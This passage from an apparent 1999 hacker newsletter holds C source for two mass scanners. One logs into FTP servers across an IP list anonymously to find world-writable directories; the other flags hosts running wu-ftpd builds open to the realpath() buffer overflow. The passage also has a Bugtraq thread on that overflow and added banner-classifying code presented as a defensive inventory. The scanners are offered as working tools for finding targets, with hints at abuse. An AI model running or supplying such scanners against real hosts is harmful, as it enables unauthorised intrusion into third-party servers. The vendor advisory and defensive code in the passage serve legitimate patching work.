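    return (i >= 0 && i < n) ? found_dirs[i] : "";
}

int main(void)
{
    int i, n = sample_world_writable_count();
    printf("login reply code: %d\n",
           ftp_reply_code("230-Welcome\r\n230 Login successful.\r\n"));
    for (i = 0; i < n; i++)
        printf("world-writable: %s\n", sample_world_writable_dir(i));
    return 0;
}
```

Wired into a scanner, ftp_reply_code() on the reply to PASS tells anonymous success (230) from failure (530) regardless of the server's wording, and a -1 says the buffer should be read again before deciding. Note that the name extraction assumes no spaces in directory names and a world-readable listing; a server that hides mode bits or uses a non-Unix LIST format needs its own parser.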

-----[ cut here, ftpscan.c ]-----
/*
* ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999
*
* This will open a specific file [-f file], get the IPs from it,
* then check if the FTP port [ -p 21 ] is open and log the version.
* If you specify the [ -o ] flag it will try to log into the FTP server
* and execute the LIST command [recursive]; this is useful
* to see if there are any world writeable directories.
*
* You should know what you can do with that.
*
* credits: localip (lip) routine has been taken from queSO.
*
* Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo
* #rdC - ub
*
*/


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <signal.h>
#include "blah.h" /* taken from queSO */

void rdcopenfile(char *g0d);
void usage(char *damn);
void RDCconnect2(char host[1000], int puerto);
int bindit(int socket_type, u_short port, int *listener);
void sigh(int z);
u_long lip(void); /* QueSO */

FILE *file;
FILE *fileout;

char ipsfile[256],
bleh[100000][200],
homer[256],
beer[256],
huhense[32];

u_long localip;

int sockfd,
leen2=0,
listing=0,
sockfd1,
ip1=0,
ip2=0,
ip3=0,
ip4=0,
lsock=-1,
port2=-1,
lala=0,
dfinder=0,
gotit=0,
xx=0;

int main(int argc, char **argv)
{
int arg; /* getopt() returns int; a char cannot reliably be compared with EOF */

int p0rt=21;

if ( argc < 3 )
{
usage(argv[0]);
}

while ((arg = getopt(argc, argv, "f:p:o")) != EOF)
{
switch(arg)
{
case 'f':
strncpy(ipsfile,optarg,128);
break;
case 'p':
p0rt = atoi (optarg);
break;
case 'o':
listing = 1;
break;
default:
usage(argv[0]);
break;

}
}
/* Find a usable local address: try ppp0..ppp4 first, then eth0..eth4. */
while (dfinder < 5)
{
char disp[500];
sprintf(disp,"ppp%d",dfinder);
strcpy(huhense,disp);
localip = lip();
sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
if (ip3 != 0 && ip4 != 0)
{
gotit=1;
break;
}
dfinder++;
}

dfinder=0;
if (gotit == 1)
dfinder=6; /* already found one: skip the eth loop below */
while (dfinder < 5)
{
char disp[500];
sprintf(disp,"eth%d",dfinder);
strcpy(huhense,disp);
localip = lip();
sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4);
if (ip3 != 0 && ip4 != 0)
{
gotit=1;
break;
}
dfinder++;
}

if (gotit == 0)
{
fprintf(stdout,"\nCannot define local ip address, aborting!\n\n");
fflush(stdout);
exit(1);
}

fprintf(stdout,"Local IP is %s\nStarting Scan... \n\n",inet_ntoa(localip));
fflush(stdout);

/* PORT h1,h2,h3,h4,p1,p2 tells the server where to send the listing: */
/* our address and data port 69*256 + 222 + lala. */
sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala);

rdcopenfile(ipsfile);
for (xx = 0 ; xx < leen2 ; xx++)
{
RDCconnect2(bleh[xx], p0rt);
lala++;
}
}

void rdcopenfile(char *g0d)
{
/* see if the file can be read... */
if ((file=fopen(g0d,"r")) == NULL)
{
printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
printf("\nCannot open file %s for reading\n\n", g0d);
exit(1);
}
/* read every line (one host per line), never past the end of bleh[] */
for ( ; leen2 < 100000 && fgets(bleh[leen2], 190, file) != NULL ; leen2++)
{
/* drop the trailing newline so gethostbyname() gets a clean name */
bleh[leen2][strcspn(bleh[leen2], "\r\n")] = '\0';
}
fclose(file);
}


void RDCconnect2(char host[1000], int puerto)
{
char versi0n[5000];
int nmb;
struct sockaddr_in beb;
struct hostent *d0h;
// struct timeval timev;
beb.sin_family = AF_INET;
beb.sin_port = htons(puerto);
d0h = gethostbyname(host);
if (!d0h)
{
if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
{
printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
printf("\nPut a correct address\n\n");
exit(0);
}
} else
{
bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length);
}

strcpy(homer,"unable to connect: Connection refused");
sockfd = socket(AF_INET, SOCK_STREAM,0);
fprintf(stdout,"\n------------------------------------------------------------------------------\n");
fprintf(stdout,"IP: %s", host);
fflush(stdout);
signal(SIGALRM, sigh);
alarm(10);
if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0)
{
fprintf(stdout,"%s\n\n",homer);
fflush(stdout);
return;

}
alarm(0);
bzero(versi0n, sizeof(versi0n));
/* leave the last byte of the zeroed buffer as a terminator for strstr() */
if ((nmb = recv(sockfd, versi0n, sizeof(versi0n) - 1, 0)) == -1)
{
fprintf(stdout,"Connection reset by peer?\n\n");
fflush(stdout);
}
if (strlen(versi0n) == 0)
{
close(sockfd);
return;
}
if (strstr(versi0n,"Microsoft") != NULL)
{
fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
fflush(stdout);
close(sockfd);
return;
}
if (strstr(versi0n,"WinSock") != NULL)
{
fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
fflush(stdout);
close(sockfd);
return;
}
if (strstr(versi0n,"NetWare") != NULL)
{
fprintf(stdout,"Skipping host cuz its runing NetWare\n\n");
fflush(stdout);
close(sockfd);
return;
}
if (strstr(versi0n,"Proxy Server") != NULL)
{
fprintf(stdout,"Runing ProxyServer, skipping host\n\n");
fflush(stdout);
close(sockfd);
return;
}

fprintf(stdout,"FTP banner:\n");
fprintf(stdout,"%s\n",versi0n);
fflush(stdout);
if (listing == 1)
{
char username[70],
sendear[17200],
listit[100];

int n;

/* login in */
strcpy(username,"anonymous");
sprintf(sendear,"USER %s\n",username);
fprintf(stdout,"Login as: %s\n",username);
write(sockfd,sendear,strlen(sendear));
/* clear the buffer before each reply so strstr() only sees the reply */
bzero(sendear, sizeof(sendear));
read(sockfd,sendear,sizeof(sendear) - 1);
if (strstr(sendear,"denied") != NULL)
{
fprintf(stdout,"Anonymous access denied, skipping\n\n");
close(sockfd);
return;
}
if (strstr(sendear,"USER anonymous") != NULL)
{
fprintf(stdout,"Remote host has closed the connection.\n\n");
close(sockfd);
return;
}
if (strstr(sendear,"unknown") != NULL)
{
fprintf(stdout,"Anonymous access unknown\n\n");
close(sockfd);
return;
}
if (strstr(sendear,"not found") != NULL)
{
fprintf(stdout,"User anonymous not found\n\n");
close(sockfd);
return;
}
fprintf(stdout,"Answer: %s\n",sendear);
bzero(sendear, sizeof(sendear));
fprintf(stdout,"Using password: bleh@\n");
write(sockfd,"PASS bleh@\n",11);
read(sockfd,sendear,sizeof(sendear) - 1);
if (strstr(sendear,"Can't set") != NULL)
{
fprintf(stdout,"Cant set guest privileges\n\n");
close(sockfd);
return;
}
fprintf(stdout,"Answer: %s\n",sendear);
bzero(sendear, sizeof(sendear));
fprintf(stdout,"Setting PORT to %d\n",17886+lala);
bzero(beer,sizeof(beer));
sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala);
write(sockfd,beer,strlen(beer));
bzero(beer,sizeof(beer));
read(sockfd,beer,sizeof(beer) - 1);
/* bind the port for data transfer */
sockfd1 = bindit(SOCK_STREAM, port2, &lsock);
read(sockfd,sendear,sizeof(sendear) - 1);
fprintf(stdout,"Using LIST command\n");
fprintf(stdout,"Answer: %s\n",sendear);
bzero(sendear, sizeof(sendear));
/* bindit() returns -1 when no data connection arrived before the alarm */
if (sockfd1 >= 0)
read(sockfd1,sendear,sizeof(sendear) - 1);
fprintf(stdout,"Recursive list:\n %s\n",sendear);
bzero(sendear, sizeof(sendear));
fflush(stdout);
// lala++;
}
close(sockfd);
close(sockfd1);
}

int bindit(int socket_type, u_short port, int *listener)
{
struct sockaddr_in address;
struct sigaction sa;
int listening_socket;
int connected_socket = -1;
int reuse_addr = 1;

/* the port argument is ignored: the data port is always 17886+lala,
   which is what the PORT command advertises (69*256 + 222 + lala) */
port = htons(17886+lala);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = port;
address.sin_addr.s_addr = htonl(INADDR_ANY);

listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0)
{
fprintf(stdout,"Cant recive list.\n\n");
fflush(stdout);
return -1;
}

if (listener != NULL)
*listener = listening_socket;

setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr));

if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0)
{
fprintf(stdout,"Error\n\n");
fflush(stdout);
close(listening_socket);
exit(1);
}

listen(listening_socket, 1);
/* install the handler without SA_RESTART so the alarm actually
   interrupts accept() instead of the kernel silently restarting it */
memset(&sa, 0, sizeof(sa));
sa.sa_handler = sigh;
sigaction(SIGALRM, &sa, NULL);
alarm(10);

/* one accept(): on timeout it returns -1 and the caller gets no data
   socket, rather than looping here forever */
connected_socket = accept(listening_socket, NULL, NULL);
alarm(0);
return connected_socket;
}

void sigh(int z)
{
alarm(0);
signal(SIGALRM, SIG_DFL);
strcpy(homer,"Unable to connect: timeout");
}


u_long lip (void)
{
int pvto,
yesto,
traversal;
struct sockaddr_in *dim0n;
struct ifreq *i;
struct ifconf ic;
char bufercito[512];
u_long found = 0;

pvto = socket (AF_INET, SOCK_STREAM, 0);
ic.ifc_pum = 512;
ic.ifc_buf = bufercito;
/* SIOCGIFCONF fills in name and address for every configured interface,
   so no per-entry SIOCGIFADDR call is needed */
ioctl (pvto, SIOCGIFCONF, (char *) &ic);
i = ic.ifc_req;
yesto = (ic.ifc_pum / sizeof(struct ifreq));
/* return the address of the interface whose name matches huhense
   (ppp0, eth0, ...), or 0 if there is no such interface */
for (traversal = 0; traversal < yesto; traversal++) {
if (!strcmp (i->ifr_name, huhense)) {
dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr;
found = dim0n->sin_addr.s_addr;
break;
}
i++;
}
close(pvto);
return found;
}

void usage(char *damn)
{
printf("\n<[( ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>");
printf("<[( usage:\n");
printf("<[( %s -f file [-p port] [-o]\n\n",damn);
printf("<[( -f file: file is the IPs file.\n");
printf("<[( -p port: port to connect to, default 21.\n");
printf("<[( -o: with this flag, ftpscan will log into the FTPserver\n");
printf("<[( as anonymous, and do a recursive list.\n\n");
exit(0);
}

-----[ end of ftpscan.c ]-----


-----[ cut here, blah.h ]-----

#include <stdio.h>
#include <fcntl.h>
#include <linux/sockios.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <errno.h>
#include <string.h>

#define NOMBRESIZE 16

struct ifmap
{
unsigned long mem_start;
unsigned long mem_end;
unsigned short base_addr;
unsigned char irq;
unsigned char dma;
unsigned char port;
/* 3 bytes spare */
};
struct ifreq
{


union
{
char ifrn_name[NOMBRESIZE]; /* if name, e.g. "en0" */
} ifr_ifrn;
union {
struct sockaddr ifru_addr;
struct sockaddr ifru_dstaddr;
struct sockaddr ifru_broadaddr;
struct sockaddr ifru_netmask;
struct sockaddr ifru_hwaddr;
short ifru_flags;
int ifru_metric;
int ifru_mtu;
struct ifmap ifru_map;
char ifru_slave[NOMBRESIZE]; /* Just fits the size */
caddr_t ifru_data;
} ifr_ifru;
};

#define ifr_name ifr_ifrn.ifrn_name /* interface name */
#define ifr_hwaddr ifr_ifru.ifru_hwaddr /* MAC address */
#define ifr_addr ifr_ifru.ifru_addr /* address */
#define ifr_dstaddr ifr_ifru.ifru_dstaddr /* other end of p-p lnk */
#define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */
#define ifr_netmask ifr_ifru.ifru_netmask /* interface net mask */
#define ifr_flags ifr_ifru.ifru_flags /* flags */
#define ifr_metric ifr_ifru.ifru_metric /* metric */
#define ifr_mtu ifr_ifru.ifru_mtu /* mtu */
#define ifr_map ifr_ifru.ifru_map /* device map */
#define ifr_slave ifr_ifru.ifru_slave /* slave device */
#define ifr_data ifr_ifru.ifru_data /* for use by interface */

struct ifconf
{
int ifc_pum; /* size of buffer */
union
{
caddr_t ifcu_buf;
struct ifreq *ifcu_req;
} ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf /* buffer address */
#define ifc_req ifc_ifcu.ifcu_req /* array of structures */

-----[ end of blah.h ]-----

Have fun!


@HWA

26.0 WuFTP scanner
~~~~~~~~~~~~~

/* This is probably more script-kiddie-ish than the last wu-ftpd scanner,
but with almost no modifications you can make Lord Somer's IMAPVuln
into a scanner that will look for anything, probably no point in
putting it on the page, I'm sure someone will code one from scratch.
- SellOut
*/

/*
IMAPVuln Scanner
By: Lord Somer <webmaster@lordsomer.com>

Scans the ips in a file to see if they run a vulnerable version of imap then output to a file
Checks if ver is 9.0, 10.166, 10.171, 10.183, 10.190, 10.205, 10.223, 10.233
Thanks to guy who made statd scanner, warchld for some of the other vulnerable version #'s.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <time.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>

/*
connect_timeo taken from mscan by jsbach
*/

#define TIMEOUT 5
#include <errno.h>
#include <stdlib.h>
#ifdef LINUX
#include <sys/time.h>
#endif
typedef void Sigfunc (int);

void connect_alarm(int signo);

int connect_timeo(int sockfd, struct sockaddr *saptr, int salen, int nsec) {
int n;
alarm(0);
signal(SIGALRM,connect_alarm);
alarm(TIMEOUT);

if( (n = connect(sockfd, (struct sockaddr *) saptr, salen)) < 0) {
close(sockfd);
if(errno == EINTR)
errno = ETIMEDOUT;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
return(n);
}

void connect_alarm(int signo) {
return;
}
/* end jsbach's code */

void usage(char *s) {
printf("Original Usage\n");
printf("IMAPVuln Scanner v1.0\n");
printf("Usage: %s <inputfile> <outputfile>\n",s);
printf(" By: Lord Somer <webmaster@lordsomer.com>\n");
printf(" Check out efnet #sploits and\nThe Hackers Layer http://www.lordsomer.com\n");
printf("This is modified to scan for, probably, exploitable wu-ftpds, same syntax.\n");
exit(-1);
}

unsigned long int res(char *p)
{
struct hostent *h;
unsigned long int rv;

h=gethostbyname(p);
if(h!=NULL)
memcpy(&rv,h->h_addr,h->h_length);
else
rv=inet_addr(p);
return rv;
}

int imapvuln(char *host); /* defined below, called from imapscan() */

void imapscan(char *i, char *o) {
FILE *iff, *of;
char buf[512];
if((iff=fopen(i,"r")) == NULL)
return;
while(fgets(buf,512,iff) != NULL) {
if(buf[strlen(buf)-1]=='\n')
buf[strlen(buf)-1]=0;
if(imapvuln(buf) == 1 && (of=fopen(o,"a")) != NULL) {
buf[strlen(buf)+1]=0;
buf[strlen(buf)]='\n';
fputs(buf,of);
fclose(of);
}
}
fclose(iff);
}
int imapvuln(char *host) {
int sockfd;
int len;
struct sockaddr_in address;
int result;
char buffer[200];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

address.sin_family = AF_INET;
address.sin_addr.s_addr = res(host);
address.sin_port = htons(21);

len = sizeof(address);
if (connect_timeo(sockfd, (struct sockaddr *)&address, len, 2) == -1) {
/* Host timed out, thus not vulnerable */
close(sockfd);
return 0;
}
/* zero the buffer and leave room for a terminator so the strstr()
   below never reads past the banner */
memset(buffer, 0, sizeof(buffer));
result = read(sockfd, buffer, sizeof(buffer) - 1);
if (result <= 0) {
close(sockfd);
return 0;
}

/*
* We look for all versions that we know are vulnerable, i did it this way so it's easy to add
* in new versions that an exploit comes out for.
*/

/* This is the only part I had to change, except for the port.
I based what it looks for on the comments by Gregory A Lundberg on
BugTraq, we could get very specific here, but for times sake I don't
think we need to. - SellOut
*/

if (strstr(buffer,"Version wu-2.4.2-academ[BETA-1") != NULL)
{
close(sockfd);
return 1;
}
close(sockfd);
return 0;
}
int main(int argc, char **argv) {
if (argc < 3)
usage(argv[0]);
imapscan(argv[1], argv[2]);
return 1;
}


@HWA

27.0 The Wu-FTPd exploit and patch thread
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: owner-wu-ftpd@wugate.wustl.edu [mailto:owner-wu-ftpd@wugate.wustl.edu] On Behalf Of Gregory A Lundberg
Sent: Tuesday, March 23, 1999 10:44 AM
To: Russ Allbery
Cc: ayu1@nycap.rr.com; wu-ftpd@wugate.wustl.edu
Subject: Re: FW: ftp exploit
>
>
On 23 Mar 1999, Russ Allbery wrote:
>
> > any comments?
>
> It's an exploit script for the path overflow bug that's already been
> announced by CERT, been on all the security lists, and has already
> been fixed in the latest version of every wu-ftpd variant that I'm
> aware of as well as being the impetus for the final mainline wu-ftpd
> release?
>
Correct. This is a full exploit against Redhat 5.2 (the original advisory
was based upon a test, not an exploit).
>
My comment: This posting proves why you need to keep up with the CERT
mailing list, if not Bugtraq and other lists. As often happens, the
exploit followed the discovery of the vulnerability by several weeks.
While it sometimes happens that exploits are distributed before the daemon
authors are notified and public security announcement made, this was not
the case here.
>
>
>
My testing shows:
>
This is an exploit using the buffer overflow described in
>
CERT Advisory CA-99.03 - FTP-Buffer-Overflows
>
Available from http://www.CERT.org/
>
It is directed solely at Redhat CD 4.2 Linux systems running a clean,
default install. It was not successful on unclean 5.2 systems, the
pre-5.2 systems I tested on, or when I built the daemon by-hand instead of
using a Redhat (S)RPM. My testing showed, while none of the systems I
have available were exploitable, the exploit WOULD HAVE WORKED but failed
for identifiable reasons.
>
Given working code for Redhat 4.2, it should be a fairly simple matter to
port to non-Linux or non-5.2 systems.
>
>
>
WHO IS VULNERABLE
-----------------
>
- Systems running ALL versions of WU-FTPD _prior_ to 2.4.2 (final),
including all 2.4.2-beta versions, ARE VULNERABLE, except as noted
below:
>
- Systems with proper upload clauses are partially protected. Many
systems do not use proper upload clauses for real/guest users and are
NOT protected from abuse by their local users.
>
- Systems with proper permissions are partially protected. Most systems
do not use proper permissions for real/guest users since they would
prevent use by Telnet/SSH/Shell .. such systems are NOT protected from
their local users.
>
>
>
WHO IS NOT VULNERABLE
---------------------
>
- Systems running 2.4.2 (final) are protected against _this_ bug. Such
systems should upgrade to VR16 for maximum security; a number of other
bugs and security problems have been fixed in VR16.
>
- Systems running 2.4.2-beta-18-VR10 or later are protected. Anyone
running VR10 through VR13 should upgrade to VR14 or later at your
earliest convenience.
>
- Systems running BeroFTPD 1.2.0 or later are NOT vulnerable. All
BeroFTPD systems should upgrade to the current version (1.3.4) at their
earliest convenience. Anyone running a vulnerable system with NEWVIRT,
will want to immediately upgrade to BeroFTPD.
>
>
>
The location of the latest version of wu-ftpd can be found in the
directory
>
ftp://ftp.vr.net/pub/wu-ftpd/
>
>wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/
>wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
>wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/
>
>--
>
>Gregory A Lundberg Senior Partner, VRnet Company
>1441 Elmdale Drive lundberg+wuftpd@vr.net
>Kettering, OH 45409-1615 USA 1-800-809-2195
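
The scanner in section 26.0 decides "vulnerable" with a single strstr() on the banner prefix `Version wu-2.4.2-academ[BETA-1`, which cannot tell a plain beta-18 from the beta-18-VR builds Lundberg lists above as protected. As an added example that belongs neither to that scanner nor to Lundberg's post, the C below pulls the version token out of a 220 greeting and applies his vulnerable/not-vulnerable list (everything before 2.4.2 final and every 2.4.2 beta is vulnerable, except beta-18 with a VR suffix of 10 or higher). The exact spelling of the bracketed `academ[BETA-18]` and `-VR14` suffixes in the constructed sample banners is an assumption modelled on the fragments quoted on this page, and BeroFTPD banners are not parsed at all; the function and type names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Outcome of checking one FTP greeting against Lundberg's list. */
enum wu_status { WU_NOT_WUFTPD = 0, WU_VULNERABLE = 1, WU_PROTECTED = 2 };

struct wu_version {
    int major, minor, patch;  /* 2.4.2 -> 2, 4, 2 */
    int beta;                 /* 0 = final release, otherwise the beta number */
    int vr;                   /* 0 = no VR suffix, otherwise the VR number */
};

/* Extract the token that follows "Version wu-" in a 220 banner; it ends at
 * the first space, ')' or line end. Returns 1 on success, 0 if the banner
 * is not a wu-ftpd greeting. Suffix spellings are assumptions (see lead-in). */
int parse_wu_banner(const char *banner, struct wu_version *v)
{
    const char *p = strstr(banner, "Version wu-");
    char tok[64];
    size_t n;

    if (p == NULL)
        return 0;
    p += strlen("Version wu-");
    n = strcspn(p, " )\r\n");
    if (n >= sizeof tok)
        n = sizeof tok - 1;
    memcpy(tok, p, n);
    tok[n] = '\0';

    memset(v, 0, sizeof *v);
    if (sscanf(tok, "%d.%d.%d", &v->major, &v->minor, &v->patch) != 3)
        return 0;

    /* beta number: "[BETA-18]" or "-beta-18" */
    const char *b = strstr(tok, "BETA-");
    if (b == NULL)
        b = strstr(tok, "beta-");
    if (b != NULL)
        v->beta = atoi(b + 5);

    /* VR build number, e.g. "VR14" */
    const char *vr = strstr(tok, "VR");
    if (vr != NULL && isdigit((unsigned char)vr[2]))
        v->vr = atoi(vr + 2);
    return 1;
}

/* Lundberg's rule: before 2.4.2 final, and every 2.4.2 beta, is vulnerable,
 * except 2.4.2-beta-18 builds at VR10 or later; 2.4.2 final and anything
 * newer is protected against this particular bug. */
enum wu_status classify_wu(const struct wu_version *v)
{
    if (v->major > 2 || (v->major == 2 && v->minor > 4) ||
        (v->major == 2 && v->minor == 4 && v->patch > 2))
        return WU_PROTECTED;
    if (v->major == 2 && v->minor == 4 && v->patch == 2) {
        if (v->beta == 0)
            return WU_PROTECTED;            /* 2.4.2 (final) */
        if (v->beta == 18 && v->vr >= 10)
            return WU_PROTECTED;            /* beta-18-VR10 and later */
        return WU_VULNERABLE;               /* any other 2.4.2 beta */
    }
    return WU_VULNERABLE;                   /* older than 2.4.2 */
}

enum wu_status check_banner(const char *banner)
{
    struct wu_version v;
    if (!parse_wu_banner(banner, &v))
        return WU_NOT_WUFTPD;
    return classify_wu(&v);
}

/* The prefix test used by the scanner in section 26.0, kept for contrast:
 * it fires on every BETA-1x banner whether or not it carries a VR suffix. */
int naive_check(const char *banner)
{
    return strstr(banner, "Version wu-2.4.2-academ[BETA-1") != NULL;
}

int main(void)
{
    /* constructed sample banners, not captured from real servers */
    static const char *samples[] = {
        "220 ftp FTP server (Version wu-2.4.2-academ[BETA-18](1) Sat Feb 20 1999) ready.",
        "220 ftp FTP server (Version wu-2.4.2-academ[BETA-18-VR14](1) Sat Feb 20 1999) ready.",
        "220 ftp FTP server (Version wu-2.4.2(1) Sat Feb 20 1999) ready.",
        "220 ftp FTP server (Version wu-2.4.1(2) Mon Jan 4 1999) ready.",
        "220 Microsoft FTP Service (Version 4.0).",
    };
    static const char *names[] = { "not wu-ftpd", "VULNERABLE", "protected" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s naive=%d  %s\n", names[check_banner(samples[i])],
               naive_check(samples[i]), samples[i]);
    return 0;
}
```

Run against your own servers' recorded greetings (not against the network) this gives an inventory of which hosts still need the upgrade Lundberg describes; the second sample shows the VR-patched build that the naive prefix test would wrongly report as vulnerable.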

------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 22:17:33 -0500
From: Gregory A Lundberg <lundberg+wuftpd@VR.NET>
To: BUGTRAQ@netspace.org
Subject: Re: wu-ftpd overflow.

On Sun, 21 Mar 1999, CyberPsychotic wrote:

> (cc'ed to bugtraq since I haven't seen yet any patches fixing this
> problem were posted there)

Yes, the exploit recently posted to Bugtraq takes advantage of the
realpath() buffer overflows .. as they exist in the Redhat RPM version
shipped on their 5.<something> CD. The exploit may require some
modification to be successfully used against other Linux/Intel systems
and, of course, will need major changes to be used against other hardware
or software platforms.

About the exploit posted on Bugtraq: my read-through of the shows it does
use the vulnerability through the MKD command. You are correct that some
Academ beta versions do not use the source-provided vulnerable realpath()
function for MKD. ISTM it should be fairly easy to modify the exploit to
make use of other commands where a given Academ beta version _does_ use
realpath(). Remember, the exploit is an _example_ of the problem, it does
not reveal the true magnitude of the vulnerability. A positive test
proves vulnerability while a negative test proves nothing.

The vulnerable and non-vulnerable versions were outlined in the advisories
which _were_ posted on Bugtraq.

The realpath() problem was openly discussed on Bugtraq weeks (months? ..
I'd have to look through the Bugtraq archives again) before the release of
the advisories. The actively maintained versions of the wu-ftpd daemon
were immediately corrected as a result of the realpath() vulnerability
discussions on Bugtraq, so they had been corrected for quite some time
prior to Netect's research indicating there may be a problem.

At the time of publication of the Netect/CERT Advisories, patches for
wu-ftpd were unnecessary since the current, maintained, versions were not
vulnerable.

My patch file for wu-ftpd, which corrects the problem, is presently 644162
bytes in length, fixes several hundred other problems with the daemon, and
is available via FTP from ftp://ftp.vr.net/pub/wu-ftpd/ for those silly
enough to want it (I rather doubt Aleph would allow it through to the
Bugtraq mailing list). I am not inclined to pull out the patches for
realpath() because the entire pile of male bovine by-product was replaced.

A patch file for the other major, maintained, version of wu-ftpd
(BeroFTPD) is not available at all. Since today it would probably run
well over 1 Meg, the maintainer sees no point in the fiction of
'patching'. He is also dis-inclined to pull out the realpath() changes
since he and I co-operated on the complete replacement of the function
(actually he did most of the initial work; I just debugged it).

At about the time of the Netect/CERT Advisories Redhat released updated
RPMs for the vulnerable Academ 2.4.2-betas they distribute. I don't know
whether they released before or after, but I do recall it was just a few
hours before their availability was discussed on Bugtraq.

Other versions (from wu-stl and academ) are not actively maintained and
should not be used in production environments. Anyone running versions of
wu-archive / the wu-ftpd daemon older than Academ's 2.4.2-beta-18 has more
severe problems than this buffer overrun, so I see no point posting the
patch. For them the correct solution is either updating to a more current
version or manual operation of the power switch.

The only current version still vulnerable when the CERT advisory was
issued was the Academ version 2.4.2-beta-18, which is (almost) not actively
maintained. A week or two following the CERT advisory Academ silently
released 2.4.2 (final).

My knowledge of the code, and my direct research indicates:

The 2.4.2 (final) version does not completely solve the problem. Nor
does your patch. (Nor, for that matter, does the Redhat patch but
that's a moot point since their patch does fix the problem for their
Linux systems.)

For systems using the realpath() function supplied with the source kit,
a patch will work to correct, or at least hide, most, if not all, of
the vulnerability. For other systems, whether or not the daemon is
vulnerable depends upon whether or not your vendor-supplied realpath()
function is vulnerable (back to the original discussion on Bugtraq).

The only change here from my recommendations appearing in the Netect
and CERT advisories is that the number of potentially vulnerable
systems has been reduced by those using the daemon-supplied realpath()
function to only those with vendor-supplied vulnerable realpath()
functions.

To determine if your daemon uses the supplied function, look in
<wuftpd>/src/config/config.<ostype> for a line reading something like:

#define realpath realpath_on_steroids

If this #define does NOT appear, contact your vendor concerning the
vulnerability of the realpath() function, or upgrade to a more-current
version of the daemon (yes, there are versions much more current than
Academ's 2.4.2/final).

Those wishing further information may contact me via the wu-ftpd support
mailing list at mailto:wu-ftpd@wugate.wustl.edu .. subscription and
unsubscription information for that mailing list are in the FAQ.

The location of the latest versions of wu-ftpd can be found in the
directory

ftp://ftp.vr.net/pub/wu-ftpd/

wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/
wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/
(The html version of the wu-ftpd list archive is
currently not working, use the Unix mailbox
format instead.)

--

Gregory A Lundberg Senior Partner, VRnet Company
1441 Elmdale Drive lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA 1-800-809-2195

------------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 18:21:22 +0500
From: CyberPsychotic <fygrave@TIGERTEAM.NET>
To: BUGTRAQ@netspace.org
Subject: wu-ftpd overflow.

~ Has some1 located the file/function where
~ the overflow takes place ?


Yes. I think overflow takes place in function realpath.c:
look at the end of the function realpath(), which first concatenates
everything together and then just does strcpy into result variable, which is
pointer to buffer of size MAXPATHLEN. You could either overflow workpath
variable in realpath, or, if your buffer is not too fat, it will be
overflowed later, when function makedir returns (called from ftpcmd).
In either case return address gets overflowed and it returns
nowhere (or to your exploit code if you put there such, no big deal).
I've made a couple of fixes to ftpd daemon to generate debugging info via
syslog, so here's what I have:

Mar 21 12:21:46 gear ftpd[21737]: ftpcmd:1294 (ftpcmd called makedir)
Mar 21 12:21:46 gear ftpd[21737]: before 3180 (calling realpath line 3128)
Mar 21 12:21:46 gear ftpd[21737]: overflow:180 (here overflow takes place)
Mar 21 12:21:46 gear ftpd[21737]: overflow:210 (again. It's being copied twice)
Mar 21 17:21:47 gear syslogd: Cannot glue message parts together
Mar 21 12:21:46 gear ftpd[21737]: after 3180 (realpath line 3128 returns)
/foo/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
